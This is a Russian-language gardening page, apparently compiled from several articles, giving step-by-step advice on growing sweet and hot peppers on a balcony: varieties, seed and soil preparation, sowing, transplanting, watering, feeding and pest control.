87 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Выращивание перца на балконе

Как вырастить горький и сладкий перец на балконе – пошаговая инструкция

Прекрасная возможность разнообразить свой домашний сад – вырастить перец на балконе. Для комнатных условий выведено множество гибридных сортов. Они могут быть настолько яркими и оригинальными, что затмят собой даже некоторые цветущие растения. Однако перец считается довольно прихотливой культурой и чутко реагирует на отсутствие необходимых условий для роста. Поэтому без знаний его агротехники невозможно получить красивые и обильно плодоносящие кусты на балконе. Важно все – от грамотного подбора грунта до своевременного сбора урожая.

Какой перец можно вырастить на балконе

Когда встает выбор, какой перец сажать на дачном участке, ни у кого не возникает сомнений – конечно, Болгарский. Это самый известный сортотип овощного перца. А что сажать на балконе?

Сладкий или острый – как сделать выбор

Перец бывает сладким и острым. Именно последнему принадлежит пальма первенства в одомашнивании. Компактные кустики, усыпанные разноцветными маленькими плодами, украшают интерьеры месяцами. Ведь жгучие перцы с их веток не просятся на стол в большом количестве. Кроме того, эти растения не слишком прихотливы к условиям выращивания. Они способны без потерь выдержать недостаток света и полива.

Жгучие перчики пригодятся для консервации или изготовления специй

Обратите внимание! Данная овощная культура имеет биологическую и техническую степень спелости. В большинстве случаев цвет плодов в каждой из них различен. Это и обуславливает декоративный эффект, когда на одном кусте есть перчики разного цвета. При технической зрелости они достигают характерного для сорта размера и веса, имея чаще всего зеленую окраску. При биологической спелости они приобретают соответствующий сорту цвет.

Плоды разного цвета на одном кусте выглядят очень привлекательно

Гораздо более капризными в этом плане считаются сладкие сорта. Но зато, сформировав для них подходящий климат на балконе, вы сможете получить неплохой и вполне съедобный урожай. Однако учтите, что эти плоды по своим вкусовым качествам будут отличаться от тех, которые вы привыкли употреблять в пищу.

Сладкий комнатный перец иногда не уступает в размерах своим садовым собратьям

Можно ли выращивать на одном подоконнике сладкий и горький перец? Нельзя. Дело в том, что при цветении обоих сортов происходит перекрестное опыление. В результате все плоды становятся горькими.

Заранее определитесь, какие растения вам нужны на балконе – со съедобными плодами и средней степенью декоративности или красивые, но несъедобные ввиду их жгучести.

Сорта овоща для домашних условий

Для выращивания на подоконнике и на балконе селекционеры вывели сорта со следующими характеристиками:

  • Небольшая высота, которая редко превышает полметра.
  • Компактная корневая система.
  • Детерминантность. Такие растения прекращают рост после выпуска определенного количества цветков.
  • Длительный период плодоношения. Особенно характерен для жгучего перца.

Такие компактные кустики без труда поместятся на подоконнике

Среди растений с острыми плодами особенно выделяются сорта:

  • “Рябинушка”. Характеризуется ранним созреванием. Перчики имеют соответствующую названию округлую форму. Их диаметр редко превышает 2,5 см. Цвета в различной степени спелости – желтый и фиолетовый.
  • “Бабье лето”. Теневыносливые растения с плодами, цвет которых может варьироваться от желтого до коричневого, а форма – от круглой до хоботовидной.
  • “Пиковая дама”. Кусты высотой 20-35 см отличаются высокой степенью декоративности за счет ярких конусообразных плодов, растущих вверх. Подходят для круглогодичного выращивания в домашних условиях.
  • “Фейерверк”. Высота куста составляет всего 20 см. При этом он усеян стручками перца длиной 3-5 см.

Также внимания заслуживают “Огонек”, “Флинт”, “ Салют”.

Яркие гроздья сорта “Бабье лето”

Широко известный сорт “Огонек”

Горький перчик может выглядеть очень декоративно

К сладким сортам, пригодным для выращивания в домашних условиях, в том числе на балконе, относятся:

  • “Патио-Иво”. Компактное растение с высокой урожайностью. Вес плодов, отличающихся превосходными вкусовыми качествами, достигает 80 г.
  • “Бэйби Йеллоу”. Раннеспелый сорт с кустами 30-35 см высотой. Имеет слегка стелющиеся стебли, на которых в большом количестве зреют желто-оранжевые плоды.
  • “Ласточка”. Плоды имеют длину 10-12 см, вес до 85 г и отличаются сочной мякотью. Неприхотлив.

Также на балконе можно посадить следующие сорта: “Тема”, “Кузя”, “Бухарест”, “Акварель”, “Остров сокровищ”.

Урожай сорта “Бэйби Йеллоу”

Перец “Ласточка” в разной степени зрелости

Выращивание перца на балконе

В большинстве случаев от посева семян до появления первых плодов проходит 75-100 дней. За это время нужно сделать довольно много.

Подготовка семян и грунта к посеву

Семена перца отличаются хорошей всхожестью, поэтому можно обойтись без стандартной процедуры их замачивания для проращивания. Но не стоит отказываться от выдерживания в стимуляторе роста. Это может быть Эпин или иной аналогичный препарат. Его разводят в соответствии с инструкцией производителя и замачивают семена на 12-20 часов.

Для обеззараживания посевного материала используют раствор марганцовки (1 г на 100 мл воды). В нем выдерживают семена 15-20 минут.

Замачивание семян в растворе марганцовки – каждый сорт в отдельном мешочке

Перец любит питательную, рыхлую почву с низким уровнем кислотности. Можно приобрести готовый универсальный грунт или самостоятельно смешать дерновую землю, перегной и песок в пропорции 2:1:1. В любом случае рекомендуется снизить кислотность земли путем добавления небольшого количества доломитовой муки или извести.

Процедуру обеззараживания необходимо провести и для грунта. Для этого его прокаливают в духовке при 200 °C в течение 10 минут или проливают небольшими порциями кипятка. Затем почве дают остыть и немного подсохнуть.

Посадка семян и пикировка рассады

Для посадки семян используют пластиковые стаканчики (200 мл), неглубокие контейнеры или ящики, заполненные грунтом. Его насыпают на предварительно уложенный слой дренажа, не доходя до края тары 2-3 см.

Семена заглубляют не более чем на 1,5 см. Присыпают землей и увлажняют ее из пульверизатора. В стаканчик можно одновременно заглубить 2-3 семени. Впоследствии слабые сеянцы удаляют, оставляя лишь один куст. Посадочную тару обязательно накрывают пищевой пленкой или прозрачной крышкой, создавая эффект парника.

Для удобства последующей пикировки оставьте между семенами расстояние в 4-5 см

Обратите внимание! На утепленном балконе можно сажать семена круглогодично. В противном случае их высевают в конце февраля-начале марта или в мае-июне, чтобы подросшее растение можно было вынести на свежий воздух без нарушения температурного режима.

Проращивают семена при температуре +23..+25°C, следя за тем, чтобы почва не пересыхала. Когда появляются первые ростки, тару переносят в светлое место. При этом в течении 5-7 дней поддерживают температуру окружающего воздуха на уровне +16..+18 °C. Затем возвращаются к оптимальному температурному режиму. Эта мера позволит пойти корневой системе в рост без некрасивого вытягивания стебля, а также закалить рассаду.

Пикировку выполняют примерно через месяц после появлении первых всходов. Так как этот овощ не любит, когда тревожат его корневую систему, саженцы просто переваливают вместе с земляным комом в большой горшок объемом 2-3 л (зависит от особенностей сорта).

Сеянцы с 5-6 нормальными листьями уже можно пикировать

На дно обязательно кладут слой дренажа, землю предварительно увлажняют и делают углубление для саженца. Заглубляют его таким образом, чтобы центральный корень не согнулся, а первые листья находились выше уровня земли на 2 см.

Комфортные условия для роста домашнего перца

Перец – тепло-, влаго-, и светолюбивая культура. Он комфортно чувствует себя на южных, юго-восточных окнах/балконах при дневной температуре воздуха +22..+26°C и ночной в диапазоне +16..+19 °C . Снижение этих значений до +13 °C может стать губительным для растений. Негативно сказываются на их росте сквозняки. Выращивание перца на балконе зимой возможно в том случае, если он качественно утеплен или дополнительно отапливается.

При хорошем освещении вы получите компактные растения с короткими междоузлиями

Имеет значение и качество полива. Он должен быть не столько обильным, сколько регулярным. Используйте только отстоянную и теплую воду (не ниже 20°C). Опытные садоводы рекомендуют придерживаться следующего правила для взрослых кустов: полив требуется тогда, когда листья становятся чуть вялыми. Однако практиковать такое в период цветения и плодоношения растений не следует.

Обратите внимание! Некоторые сорта горького перца особенно нуждаются в увлажнении воздуха, поэтому их нужно не только регулярно поливать, но и опрыскивать.

Если вы выращиваете перец при недостаточном освещении, ему понадобится подсветка люминесцентными лампами. Их устанавливают на расстоянии 30-50 см от верхушек растений. Чтобы продлить световой день, их включают до рассвета и после заката солнца. Иногда может понадобиться непрерывная подсветка по 10-12 часов.

Выращивание перца зимой требует дополнительной подсветки

Уход за сладким и горьким перцем на балконе

Особую роль в надлежащем уходе за этой овощной культурой играет ее подкормка питательными веществами. Обычно это азот, фосфор и калий. Первые два элемента важны на этапе наращивания растением зеленой массы, а третий – для получения красивого и обильного урожая. Они удачно сбалансированы в готовых минеральных удобрениях, которые легко найти в любом специализированном магазине.

Удобрения вносят через 2-3 недели после появления всходов, а затем через каждые 10 дней. При этом не забывайте следить за соотношением основных элементов!

Жидкое удобрение вносят только после полива растений

Подавляющее большинство сортов практически не требует пасынкования. В редких случаях, когда после выпуска цветов продолжается рост побегов, прищипывают макушку и обрезают лишнюю зеленую массу. А вот пожелтевшие и увядшие листья обязательно удаляют.

Если после сбора урожая вы хотите оставить растение на следующий год, необходимо обрезать его побеги на ⅔ и создать определенные условия. Это уменьшенный полив, снижение температуры до +18 °C, затенение. В конце февраля-начале марта куст возвращают к привычным условиям.

Видеосоветы опытных огородников

Как вырастить болгарский перчик на городском балконе:

Огород на балконе:

Таким образом, грамотный подход к выбору сорта, контроль за микроклиматом на балконе и правильный уход позволят получить неплохой урожай перца на нескольких квадратных метрах площади. Конечно, он не сэкономит ваш семейный бюджет, но обязательно порадует своим наличием. Добавьте к нему несколько горшочков с зеленью, комнатные помидоры – и вкусный салат не заставит себя ждать даже зимой!

Руководство по выращиванию перца на балконе пошагово: получаем хороший урожай, не выходя из дома

Чтобы вырастить любимые овощи своими руками, не обязательно иметь собственный участок земли. Можно создать небольшой огород на балконе. В специализированных магазинах представлено большое количество гибридов и сортов, пригодных для выращивания на балконе и подоконнике. Предпочтение отдается компактным, низкорослым и неприхотливым культурам.

В число овощей, которые выращива ют на балконе, входит перец, как сладкий, так и горький. Для получ ения хорош его урожа я перца важно учитывать требования к окружающей среде и грунту, соблюдать правила ухода за растениями и регулярно вносить подкормки в почву.

Что необходимо для выращивания перца на балконе

Чтобы вырастить перец на балконе, создадим для него комфортные условия.

При выборе места для выращивания ва жно учитывать , что эта культура любит свет и тепло. Поэтому для перца подойдет балкон, находящийся с южной, восточной или западной стороны. На затемненной стороне дома сделайте дополнительную подсветку. Лучший вариант – застекленный балкон, он защитит растение от сквозняков и перепадов температур.

Совет. В солнечные дни при высокой температуре воздуха перцы нуждаются в затемнении, поэтому окна на балконе желательно завесить шторами или установить жалюзи.

Горький перец выращивают не только на балконе, но и на подоконнике. Окно должно быть юго-западное или восточное.

После выбора места определяемся с сортом перца и изуч аем пошаговое выращивание.

Особенности выращивания

Перец бывает сладким и острым. Нельзя выращивать на одном подоконнике или балконе оба вида , так как в период цветения произойдет перекрестное опыление, и все плоды в результате будут горькими. Выращивать на балконе разные сорта только, например, сладкого перца тоже не получится. Из-за перекрестного опыления их плоды будут усредненной формы, цвета, вкуса и запаха. Поэтому остановите выбор на одном сорте или гибриде.

Независимо от того, какой перец (острый или болгарский) вы будете выращивать, помнит е , что растение необходимо подобрать:

  • низкорослое (не более 40-50 см);
  • с компактной корневой системой;
  • с длительной фазой плодоношения;
  • детерминантное, то есть прекращающее рост в определенной точке.

Острый перец не слишком прихотлив в выращивании. Он способен выдержать недостаток воды и света практически без потерь. Это балконное чудо не только приносит плоды, но и служит декоративным украшением. Маленькие кустики с яркими плодами украсят любой интерьер.

Сладкий перец более требователен к уходу, но если создать для него благоприятные условия, богатый урожай гарантирован.

Внимание! Вкусовые качества выращенного на балконе перца несколько отличаются от тех, которые мы привыкли употреблять в пищу.

Сорта для выращивания на балконе

Для выращивания перца на балконе или подоконнике выведено большое количество сортов, что позволяет подобрать оптимальный вариант. Основн ое условие: сорт должен быть самоопыляемы м .

Сорта сладкого перца, пригодные для выращивания на балконе:

  1. Майкопский 470 — высокопродуктивный сорт. Период вызревания — 110-120 дней, высота куста — 35-45 см, плоды пирамидальные.
  2. Акварель — ранний сорт. Период созревания — 100-108 дней, высота куста — 50-80 см, плоды мелкие, продолговатые.
  3. Винни Пух — сладкий раннеспелый сорт (107-115 дней). Крупные плоды конических размеров, высота куста — не более 30 см.
  4. Таинственны остров — раннеспелый сорт. Техническая спелость наступает на 85 день. Компактный куст, высота — 40-60 см, плод в виде заостренного конуса.
  5. Первенец Сибири. Скорость созревания — 108-113 дней, высота куста — около 50 см, плоды конусовидные.
  6. Карлик — компактн ое , детерминантн ое , штамбов ое растени е . Высота — 30-40 см, в етвистость и облиственность слабые.

Среди лучших сортов острого перца выделяют:

  1. Венгерский острый — низкорослое растение. Дает до 30 перцев с куста.
  2. Волшебный букет — среднеспелый сорт. Высота куста — 70 см.
  3. Халапеньо — вид мексиканского перца чили, отличающийся особой жгучестью. Многолетник. Существует несколько сортов перца Халапеньо: ранний, оранжевый, пурпурный, желтый.
  4. Горячая вишня — небольшое компактное растение. Период созревания — 85-90 дней.
  5. Хабанеро — один их самых острых перцев. Отличается высокой урожайностью, с одного куста собирают около 90 плодов.

Пошаговая инструкция по выращиванию

Выращивание перца на балконе требует соблюдения определенных правил.

Подготовка места и тары

Если для выращивания остр ого перца достаточно подоконника , то для сладкого перца предпочтительнее застекленный балкон. Выбирают самое освещенное место, которое оборудуют полками или стеллажами. Подойдут и мини парники, предназначенные для балконов. Ранней весной, когда температура воздуха невысокая, их используют для выращивания рассады. Летом пленочное покрытие снимают, и мини-парник служит стеллажом для растений.

Для посадки семян перца используют пластиковые стаканы, небольшие контейнеры или ящики.

Подготовка семян

Так как у перца длинный вегетационный период, начать посадку лучше в первой декаде февраля, если планируется выращивание на застекленном балконе. Если балкон не застеклен, оптимальное время высадки — первая декада мая.

Посев семян острого перца начинают уже в январе.

Для обеззараживания семенной материал замачивают на 3 часа в слабом растворе марганцовки (1:1000). Для посадки берут семена, опустившиеся на дно, всплывшие выбрасывают.

Затем семена стоит слегка просушить и замочить в стимуляторе роста «Эпин» (1 капля на 100 мл воды) или «Циркон» (1 капля на 300 мл воды) на 18 часов.

После этого посадочный материал складывают в белую хлопковую ткань, сложенную в несколько слоев и пропитанную водой. Ткань связывают в узелок и помещают в полиэтиленовый пакет, который оставляют в теплом месте. Через три дня семена проверяют: если проклюнулась меньшая половина, сверток оставляют еще на 1-2 дня.

После прорастания семена закаливают, помещая их на нижнюю полку холодильника на 3 дня.

Подготовка почвы

Перец любит рыхлую, питательную почву с низким уровнем кислотности ( pH в пределах 6,0-7,0). Чтобы снизить кислотность, в землю добавляют известь или доломитовую муку. Почву приобретают готовую либо самостоятельно смешивают дерновую землю, песок и перегной в пропорции 2:1:1. Перед высадкой семян почву обеззараживают. Для этого ее проливают кипятком, а затем дают немного подсохнуть, либо в течение 10 минут прокаливают в духовке при температуре 200 °С.

Посадка

На дно подготовленной тары засыпают дренажный слой (мелкий керамзит, крупный песок), затем засыпают грунт. Почву проливают теплой водой, в случае усадки добавляют еще.

В пластиковый стаканчик помещают два семечка на расстоянии 2-3 см на глубину 1 см. При посеве в ящик делают бороздки глубиной 1 см на расстоянии 4 см одна от другой, интервал между семенами — 3 см. Семена засыпают землей, емкость накрывают пленкой.

Проращивают семена при температуре 23-25 °С. С появлением первых ростков пленку снимают и рассаду переносят в светлое место. Температуру снижают до 18 °С на 5-7 дней, чтобы закалить растение. Затем устанавливают оптимальный температурный режим.

Чтобы выросла полноценная рассада, а впоследствии — здоровое растение, дающее плоды, соблюдайте правила ухода.

Пересадка и пикировка

Через 3-4 недели перцы пересаживают и пикир уют . Для этого подготавливают тару: ящики на 2 растения или отдельные горшки емкостью 2 л. На дно посуды насыпают дренаж, затем грунт (садовую почву, песок, торфяник в равных пропорциях). Землю увлажняют и делают лунку для растения.

Справка. Пересадкой перцев лучше заниматься в пасмурный день либо предварительно затемнить окна.

За два часа до пересадки рассаду орошают. В горшок высаживают один саженец. В ящике соблюдают расстояние между растениями не менее 30 см.

Сеянец поддевают вместе со слоем земли, корешок аккуратно обрезают не более чем на ¼ длины. Растение помещают в новую тару так, чтобы основной корень не загнулся, а листья возвышались над поверхностью земли на 15-20 мм. Почву приминают.

В течение 2-3 дней рекомендуется выдерживать температурный режим в пределах 19-21 °С. Более низкие температуры могут вызвать образование черной ножки, и растение погибнет. Для предотвращения корневой гнили требуется соблюдать умеренную влажность.

Требования по уходу

Для нормального роста и развития перца важно поддерживать температурный режим. Для болгарского перца оптимальная температура днем — 22-27 °С, ночная не должна опускаться ниже 17-19 °С. Оптимальная температура выращивания острого перца: зимой — от 16 до 18 °С, летом — от 22 до 25 °С.

Недостаток освещения следует компенсировать дополнительной подсветкой (фито- или люминесцентными лампами).

Перец любит влагу. Если воздух в комнате сухой, растения дополнительно опрыскива ют . Поливать следует теплой водой небольшими порциями. В период цветения и формирования завязи на куст уходит около 1 литра воды в день, в жаркую погоду — до 2 литров.

Чтобы удержать влагу в почве, ее мульчируют. А вот рыхление лучше не проводить либо делать аккуратно, чтобы не повредить корни.

Подкармливают перцы три раза за вегетационный период: через неделю после высадки рассады, во время цветения и в период образования первой завязи Применяют комплексные удобрения для овощных культур. Также делают дополнительные подкормки: в период цветения — калийными удобрениями и янтарной кислотой, в период появления завязи — удобрениями с фосфором.

Для формирования куста существует ряд правил:

  • пасынки, растущие из пазух листьев, удаляют;
  • листья, растущие ниже первого разветвления, удаляют;
  • формирование куста идет только из двух побегов;
  • первые цветы удаляют на стадии бутонов;
  • на слабом ответвлении прищипывают макушку над первой завязью;
  • чтобы остановить рост растения и дать развиться сформировавшимся завязям, за месяц до конца вегетационного периода прищипывают все верхушки.

Болезни и вредители

З еленая тля — один из основных вредителей перца. О на обычно залетает с улицы . Чтобы избавиться от нее, растение промывают струей воды.

Если на кустах появилась паутина, значит, его атаковал паутинный клещ. В этом случае растения промывают раствором хозяйственного мыла (1 кусок мыла на 10 л воды), а земл ю поли вают слабым раствором марганцовки (1 ч. л. на 1 л воды).

Скручивание листа и появление на нем фиолетового оттенка свидетельствует о нехватке фосфора. Мелкая листва сероватого цвета говорит о нехватке азота. Если лист скрутился и края стали сухими, значит, не хватает калия. Следует провести подкормку фосфорной кислотой, аммиачной или калиевой селитрой.

Белые точки на листьях появляются при застаивании влаги, значит, следует сократить полив.

Справка. При правильной подготовке семян и уходе за растениями балконные перцы практически не поражаются болезнями и вредителями.

Сбор и хранение урожая

Плоды перцев собирают по мере созревания. Созревшие срезают, а не отламывают.

Несколько кустов болгарского перца, выращенного на балконе, не принесут урожая, достаточного для заготовок и консервации. Но зато разнообразят ежедневный рацион свежими овощами .

А вот острый перец будет радовать урожаем с конца весны до декабря. Некоторые сорта приносят до сотни плодов. Собирают жгучий перец, когда он поспеет, т. е. станет оранжевым, красным или желтым.

Острый перец хранят в коробках целыми стручками в сушеном виде. Либо перемалывают и засыпают в банки. Еще один вариант — в растительном масле. П ромытый перец помещают в стеклянную бутылку и зали вают рафинированным маслом. Через 1-2 месяца получается ароматная настойка.

Заключение

Перец считается прихотливой культурой. Он остро реагирует на отсутствие необходимых условий для роста. Вырастить перец на балконе непросто, но вполне возможно. Для этого следует учесть особенности выращивания сладкого и острого перца, правильно подобрать и оборудовать место, грамотно выбрать сорт и соблюсти все агротехнические требования по подготовке и уходу.

Выращивание перца на балконе

Овощи, выращенные своими руками, всегда вкуснее и полезнее покупных. Люди, не имеющие в своем распоряжении приусадебных участков, могут попробовать проводить выращивание перца на балконе.

Выращивание перца на балконе

Условия выращивания перца

Выращивание любой культуры начинается с создания благоприятных условий.

Сперва выбирают емкость для посадки растений. Используют деревянные ящики или цветочные горшки. С каждой пересадкой емкости увеличивают. Обязательным условием выбора тары для выращивания является наличие отверстий на дне. Это нужно для оттока лишней жидкости.

Как выбрать место

Выращивать такой овощ необходимо на южной или восточной стороне. Если на растение попадают прямые солнечные лучи, его лучше убрать в тень. Если же кустам недостаточно солнца, в лоджии можно установить лампы: они продлят световой день для саженцев. Он должен длится примерно 10-12 часов.

Температурный режим

Если выращивать салатный перец на балконе, стоит позаботиться о стабильности температурного режима. Температура на подоконнике должна быть в пределах 25°С. Перец ограждают от сквозняков.

Полив

Полив производят по мере высыхания верхнего пласта почвы. Вода должна быть отстоянной, с температурой 30°С. В летнее время растения опрыскивают. На батарею кладут влажную ткань: это не позволяет сеянцу перегреваться. Вырастить горький перец на балконе при низких температурах не получится: сеянцы будут плохо развиваться и вскоре погибнут.

На балконе можно вырастить как сладкий, так и горький перец, при этом кустам необходимо обеспечить раздельное выращивание, иначе овощи будут опылять друг друга.

Выбор семян

Не только благоприятные условия, но и правильный выбор сорта для выращивания на балконе перца играет важную роль. Выбирать стоит низкорослые и компактные сорта. По времени созревания их делят на:

Вырастить острый перец на балконе можно из купленных семян или из прошлого урожая. На рынке представлено много сортов сладкого и жгучего овоща. Выбор семян сводится к условиям выращивания и личным предпочтениям.

Выбирают сорта, достигающие роста 30-50 см. Такие растения подходят для любых размеров окон, неприхотливы в уходе.

Подготовка семян

Семена перед посадкой обязательно готовят

Семена готовят к посадке. Процесс включает в себя дезинфекцию и проращивание.

Для дезинфекции применяют раствор марганцовки. Семена замачивают на 20 минут, а затем промывают холодной водой. Это позволяет избежать заражения и болезней.

Биостимуляторы

Для лучшего роста семена замачивают в биостимуляторах роста:

  • 2 капли эпина разводят в 100 мл воды;
  • 1 капля циркона — в 300 мл воды.

В таком растворе семена находятся сутки, затем их помещают в марлю или ткань. Посадочный материал хранят в темном, теплом месте (его температура — 22-25°С). Марлю периодически увлажняют, ей не дают пересохнуть. Таким способом семена выращивают до проклевывания.

Как посеять семена

Сеять семена начинают в первую декаду февраля. Пошагово процесс посева выглядит так:

  • Подготовка емкости и грунта под посадку. Специальную почву для выращивания овоща можно купить в магазине. Подойдет смесь из перегноя, песка и дерновой земли. Грунт перед посадкой обрабатывают кипятком.
  • Высеивание семян. Ее производят на глубину 6-10 см, посадочный материал располагают на расстоянии 2 см друг от друга. Если посадить гуще, рассада получится вытянутой.
  • Полив теплой водой, укрытие пленкой.
  • Помещение в теплое место.

Первые всходы появляются спустя неделю после высадки семян.

После образования 3 листьев рассаду подкармливают. С этой целью на 10 л воды разводят 30 г калийной соли, 50 г мочевины и 125 г суперфосфата.

После этого посадки поливают простой водой. Полив осуществляют каждые 3 дня.

Острый перец высевают таким же образом, как и сладкий.

Пикировка рассады

Пикировку проводят, как только на рассаде появляется 5 лист. Сам процесс пикировки заключается в пересаживании сеянца из маленькой емкости в большую. Во время этого процесса отбирают более крупную и хорошо развитую рассаду.

Необходим горшок или ящик для пересадки. Почва обильно поливают, в центре делают ямку. Сеянец аккуратно достают из горшка вместе с комом земли. Держать за корень не рекомендуют, чтобы не было повреждений. Лучше придерживать за верхние листья.

При появлении пятого листа растения можно пересаживать

Рассаду помещают в центр и засыпают землей так, чтобы листья находились на 2 см выше поверхности. Грунт уплотняют вокруг посаженного растения и поливают теплой водой, после чего рассаду устанавливают на подоконник. В помещении должно быть тепло, отсутствовать резкие перепады температуры.

Высадка рассады в грунт

Острый или любой другой перец на балконе выращивают до тех пор, пока на нем не появится 12 листков. Растения уже имеют крепкий стебель зеленого цвета и в длину достигают 25 см.

Если балкон застекленный, высаживать горький перец можно в первой декаде мая, а если открытый — во второй. Если на улице температура ниже 15°С, необходимо дождаться тепла.

Перед пересадкой грунт удобряют. На 1 кв. м вносят 40 г калийных и фосфорных удобрений и 30 г азотных. Также используют компост или перегной. Свежий навоз использовать не рекомендуют, так как листки могут опасть.

Если перец низкорослый, сеянцы рассаживают на расстоянии 15 см, средние лучше рассаживать друг от друга на 25 см, а крупные сорта — на 35 см.

Рекомендации по уходу

Вырастить перец на балконе без ежедневного ухода невозможно. Наблюдение за его развитием и состоянием листьев помогает предотвратить развитие болезней.

Состояние листьев указывает на нехватку определенных микроэлементов:

  • недостаточное количество калийной селитры дают засохшие по краям, скрученные листья;
  • недостаток аммиачной селитры выражается в образовании мелких матово-серых листьев;
  • нехватка фосфора приведет к образованию фиолетовых листьев;
  • отсутствие магния придает кроне мраморный цвет.

Для подкормки перца нельзя использовать хлористый калий: его состав вреден для корневой системы овоща.

Растения может повредить паутинный клещ. Его легко обнаружить по образованию паутины между листьями. Для профилактики рассаду обрабатывают карбофосом или кельтаном.

Для развития крепких побегов удаляют нижние листья. Удалению подлежат засохшие листья и ростки без плодов.

Для увеличения урожайности сеянец прищипывают. В этом случае корни рассады впитывают все полезные вещества, тогда микроэлементы уходят в плод, а не на рост сеянца.

Выращиваем сладкий перец на балконе

Приход весны у многих связан с началом огородных работ. Но что делать, если нет своего участка земли, а желание вырастить своими руками любимые овощи есть? В этом случае, для выращивания, например, сладкого перца в домашних условиях, подойдет балкон. Это очень влаголюбивое и светолюбивое растение, свободно переносящее легкое затенение. Для его выращивания подойдет балкон: находящийся с южной, восточной или западной стороны. Чтобы получить урожай перца на балконе, расположенном с затененной стороны дома, потребуется организовать дополнительное освещение.

Как подготовить балкон к выращиванию перца

Для выращивания огородных культур на балконе, отводится самое открытое и освещенное место, обычно — у стены по обе стороны от окна или прямо у остекления. Балкон оборудуется: стеллажами, полками, высокими столиками. Их, можно изготовить своими руками: из брусков и досок или свариваются из труб, можно б/у. Расстояние между полками, рассчитывается таким образом, чтобы на них свободно помещались ящики и горшки, а растениям хватало места для роста.

Заводская модель теплицы для балкона

Также, для выращивания перца используются мини парники, предназначенные для балконов. Они удобны тем, что ранней весной, когда температура воздуха невысокая, в них выращивается рассада, а когда потеплеет, пленочное укрытие убирается, и парник используется как обычный стеллаж под ящики с перцем. Такую конструкцию — можно сделать самому.

Подготовка семян к посеву

Семена перца прорастают очень медленно и не дружно, поэтому, чтобы ускорить этот процесс, их следует подготовить к посеву. В первой декаде февраля, семена замачиваются в слабом растворе марганцовки — на 3 часа. По прошествии этого времени, всплывшие семена выбрасываются, а для прорастания берутся только опустившиеся на дно.

Как подготовить семена перца к посеву:

  • Семена подсушиваются и замачиваются в стимуляторе роста Циркона или Эпина. Проводя эту процедуру, следует следить за дозировкой приготавливаемого раствора. Циркона разводится в воде из расчета 1 капля средства на 300 мл воды, а Эпина – 1 капля на 100 мл воды. Время обработки в обоих случаях 18 часов;
  • Семена помещаются в белую хлопковую ткань, сложенную в несколько слоев и намоченную в теплой воде. Затем мокрый сверток заворачивается в полиэтиленовый пакет и оставляется в теплом месте, как правило, возле радиатора отопления;
  • Через 3 дня ткань можно развернуть и проверить состояние посевного материала. Если наклюнулась небольшая часть семян, их оставляют еще на 1-2 дня;
  • После прорастания семена проходят закаливание, которое поможет будущим растениям перенести пересадку. Их помещают на нижнюю полку холодильника и оставляют на 3 дня, поле чего, посевной материал полностью готов к посеву.

Выращивание рассады перца

Если в начале марта, семена посеять на рассаду, в середине апреля — растения можно будет пересадить на постоянное место. В это время, даже на неотапливаемом застекленном балконе, легко поддерживать температуру около 20 C – оптимальную для выращивания перца.

В чем выращивать рассаду перца:

  • Деревянные ящики;
  • Торфяные стаканчики;
  • Торфяные таблетки;
  • Специальные кассеты;
  • Пластиковые стаканчики.

Торфяная таблетка

Проще всего для выращивания рассады использовать торфяные таблетки. Они представляют собой невысокие цилиндрики из прессованного субстрата. Перед посевом семян таблетки помещаются в поддон с бортиками высотой до 8 см, в который наливается теплая вода. Когда субстрат разбухнет, лишняя жидкость сливается, углубление в центре торфяного цилиндра расширяется до 1 см, и в него помещается одно семя. Сверху таблетки накрываются прозрачной емкостью или пленкой, и оставляются в теплом месте.

Во всех остальных случаях следует подготовить заранее почвосмесь и наполнить ею емкости: ящики, стаканчики, кассеты. На дно емкости насыпается слой дренажа (крупнозернистый песок, керамзит мелких фракций), затем почва. Земля проливается теплой водой и, если она усела, добавляется еще. Если посев проводится в ящик, в грунте на расстоянии 4 см одна от другой проделываются бороздки глубиной 1 см. В эти бороздки выкладываются семена с интервалом в 3 см, засыпаются землей, и ящик накрывается пленкой. Посев перца в стаканчики проводится аналогичным способом, только в каждую емкость следует посадить по 2 семя на расстоянии одно от другого 2-3 см.

До появления всходов емкости с посевами оставляются в теплом месте, не обязательно освещенном, например, возле батареи отопления. Ящики устанавливаются на невысокой подставке вплотную к радиатору, и время от времени поворачиваются, чтобы под пленкой везде был одинаковый микроклимат. С внутренней стороны пленки должны появиться капельки конденсата, который ничем не грозит семенам – опадая, он будет увлажнять почву, поэтому полив не проводится до появления всходов. Чтобы не нарушить микроклимат под пленкой, ее не следует снимать, пока из земли не появятся первые всходы.

Как только семена прорастут и на поверхности земли появятся зеленые ростки, пленочное укрытие снимается, а емкости переносятся на балкон. Они устанавливаются на полки, а если балкон не отапливаемый, помещаются в тепличку. Температура воздуха в этот период снижается до 18 C.

Пересадка перца

В возрасте 3 недель при нормальном развитии на рассаде перца уже есть два настоящих листика, и пора подумать о пересадке. Для этого, подготавливается почва, и ею заполняются большие ящики на несколько растений, или горшки, отдельные для каждого растения. Почвосмесь готовится из равных частей садовой плодородной земли, песка и торфяника. На дно емкости насыпается слой дренажа, а затем доверху насыпается почва.

Нужно ли пикировать перец?

При выращивании в открытом грунте перец, в отличие от других культур (например, помидоров), не пикируется, то есть, его стержневой корень не укорачивается. Это связано с тем, что рассада перцев очень болезненно переносит процедуру пикирования, и без особой надобности она не проводится. Но выращивание перца на балконе, это особый случай. В условиях ограниченного земельного пространства невозможно обеспечить корневую систему достаточно глубоким слоем почвы, поэтому во время пересадки следует обрезать центральный корешок. Эта операция стимулирует разрастание боковых корешков.

Как правильно пересадить рассаду

Пересадка перцев проводится в пасмурный день, чтобы солнце не угнетало молодые растения, перенесшие стрессовую операцию. Если погода слишком жаркая, следует слегка затенить окна с помощью жалюзи.

Высадка рассады:

  • Почва в подготовленных ящиках с почвой и в емкостях с рассадой хорошо увлажняется;
  • В земле делается лунка пластиковой или деревянной палочкой;
  • Корень растения поддевается палочкой как можно глубже и вынимается с небольшим комом земли;
  • Ножничками обрезается кончик корня не более чем на ¼ его длины;
  • Взяв росток пальцами, его помещают в подготовленную лунку до семядольных листочков;
  • Палочка втыкается в почве на расстоянии 2-3 см от растения под углом, и легким движением почва подвигается к стволику;
  • Осторожно взяв росток двумя пальцами, его подтягивают вверх, чтобы семядольные листики находились на 2 см над почвой. Благодаря этому корень в земле расправится и примет вертикальное положение;
  • Почва у основания ростка аккуратно приминается пальцами.

